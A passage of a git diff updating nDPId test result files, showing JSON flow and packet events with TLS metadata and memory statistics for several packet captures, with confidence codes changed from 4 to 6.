{"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","server_names":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=NL, ST=Noord-Holland, L=Amsterdam, O=TERENA, CN=TERENA SSL CA 3","subjectDN":"C=IT, ST=Lazio, L=Roma, O=Consiglio Nazionale delle Ricerche, OU=IIT, CN=www.iit.cnr.it","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"C4:F6:98:75:7E:20:5C:B6:33:14:59:3F:CF:26:96:38:D0:4B:73:69"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2083,"flow_first_seen":1620898024056,"flow_last_seen":1620898029980,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1877633,"flow_avg_l4_payload_len":901,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55262,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":801,"flow_first_seen":1620898025216,"flow_last_seen":1620898026198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648336,"flow_avg_l4_payload_len":809,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":621,"flow_first_seen":1620898025216,"flow_last_seen":1620898026065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":509563,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":927,"flow_first_seen":1620898025216,"flow_last_seen":1620898026187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":807134,"flow_avg_l4_payload_len":870,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":800,"flow_first_seen":1620898025217,"flow_last_seen":1620898026128,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":676127,"flow_avg_l4_payload_len":845,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00812{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":769,"flow_first_seen":1620898025217,"flow_last_seen":1620898026109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":648144,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1620898027036,"flow_last_seen":1620898027166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5402,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1620898029980,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6019,"source":"safari.pcap","alias":"nDPId-test","packets-captured":6019,"packets-processed":6019,"total-skipped-flows":0,"total-l4-payload-len":5172339,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":7,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1620898029980} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6019/6019 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 7/7 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6077366 bytes -~~ total memory freed........: 6077366 bytes -~~ total allocations/frees...: 124181/124181 +~~ total memory allocated....: 6211000 bytes +~~ total memory freed........: 6211000 bytes +~~ total allocations/frees...: 126943/126943 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1220 chars diff --git a/test/results/salesforce.pcap.out b/test/results/salesforce.pcap.out index 117191afa..7c2a5237a 100644 --- a/test/results/salesforce.pcap.out +++ b/test/results/salesforce.pcap.out @@ -4,10 +4,10 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1637949675032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1637949675032,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlHnAqAGyVd6OBtR\/AbsUUf9OAAAAALAC\/\/85bQAAAgQFtAEDAwUBAQgKBrZmwAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1637949675060,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637949675060,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGo31V3o4GwKgBsgG71H+paXwVFFH\/T6AScSBLcQAAAgQFjAQCCAok00OjBrZmwAEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637949675061,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlIXAqAGyVd6OBtR\/AbsUUf9PqWl8FoAQECja8QAAAQEICga2Ztwk00Oj"} -00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} +00889{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1637949675032,"flow_last_seen":1637949675061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1637949675061,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01254{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637949675032,"flow_last_seen":1637949675088,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3982,"flow_avg_l4_payload_len":497,"midstream":0,"thread_ts_msec":1637949675088,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"help.salesforce.com","server_names":"support.salesforce.com,help.salesforce.com","ja3":"7570245c781d7d7a68e31419177e728d","ja3s":"263c859c5391203d774bc0599793d915","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=US, ST=California, L=San Francisco, O=salesforce.com, inc., CN=support.salesforce.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"69:0B:02:F6:58:63:79:69:21:33:61:1A:5C:3D:6A:BD:FC:55:0C:6F"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1637949675032,"flow_last_seen":1637949675181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4195,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1637949675181,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"85.222.142.6","src_port":54399,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Salesforce","breed":"Safe","category":"Cloud"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"salesforce.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":4195,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1637949675181} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878309 bytes -~~ total memory freed........: 5878309 bytes -~~ total allocations/frees...: 118137/118137 +~~ total memory allocated....: 6011943 bytes +~~ total memory freed........: 6011943 bytes +~~ total allocations/frees...: 120899/120899 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 1259 chars diff --git a/test/results/sccp_hw_conf_register.pcapng.out b/test/results/sccp_hw_conf_register.pcapng.out index c6c7732f1..12acfd023 100644 --- a/test/results/sccp_hw_conf_register.pcapng.out +++ b/test/results/sccp_hw_conf_register.pcapng.out @@ -4,8 +4,8 @@ 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAsOMQAAP8GkNUKtG46CrRuMLV9B9BgU38BAAAAAGACECD5kQAAAgQFtA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1557178511664,"pkt":"uDhhiHXEAFBW6tqSCABFAAAsAABAAEAGSPoKtG4wCrRuOgfQtX0KPck5YFN\/AmASchDEGQAAAgQFtA=="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1557178511664,"pkt":"AFBW6tqSuDhhiHXECABFYAAoOMUAAP8GkNgKtG46CrRuMLV9B9BgU38CCj3JOlAQECA9xwAA"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1557178511664,"flow_last_seen":1557178511707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":568,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1557178511707,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1557178511664,"flow_last_seen":1557178511664,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1557178511664,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1557178511664,"flow_last_seen":1557178511908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1557178511908,"l3_proto":"ip4","src_ip":"10.180.110.58","dst_ip":"10.180.110.48","src_port":46461,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"sccp_hw_conf_register.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":596,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1557178511908} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871984 bytes -~~ total memory freed........: 5871984 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003570 bytes +~~ total memory freed........: 6003570 bytes +~~ total allocations/frees...: 120893/120893 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 707 chars diff --git a/test/results/sctp.cap.out b/test/results/sctp.cap.out index da2afd7ef..706b94263 100644 --- a/test/results/sctp.cap.out +++ b/test/results/sctp.cap.out @@ -2,14 +2,14 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1088696689784} 00539{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3} 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1088696689784,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1088696689784,"pkt":"AKCAAF5GCAADSgA1CABFAAB8FBwAADuESlQKHAYrChwGLEAAC4AAAW8KbbAYggADAFsoAkNFAACgvQAAAAdNRUdBQ08vMiA8bWctdHI+OjE2Mzg0ClJlcGx5ID0gMTc0MDkxewpDb250ZXh0ID0gMjU1ewpNb2RpZnkgPSBNVVgvMjU1Cn0KfQpn"} -00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1088696689784,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1088696689784,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1088696689784,"pkt":"CAADSgA1AKCAAF5GCABFAAAwCdlAAP+EUOIKHAYsChwGKwuAQAAhRBUjK\/ICTgMAABAoAkNFAAAgAAAAAAA="} 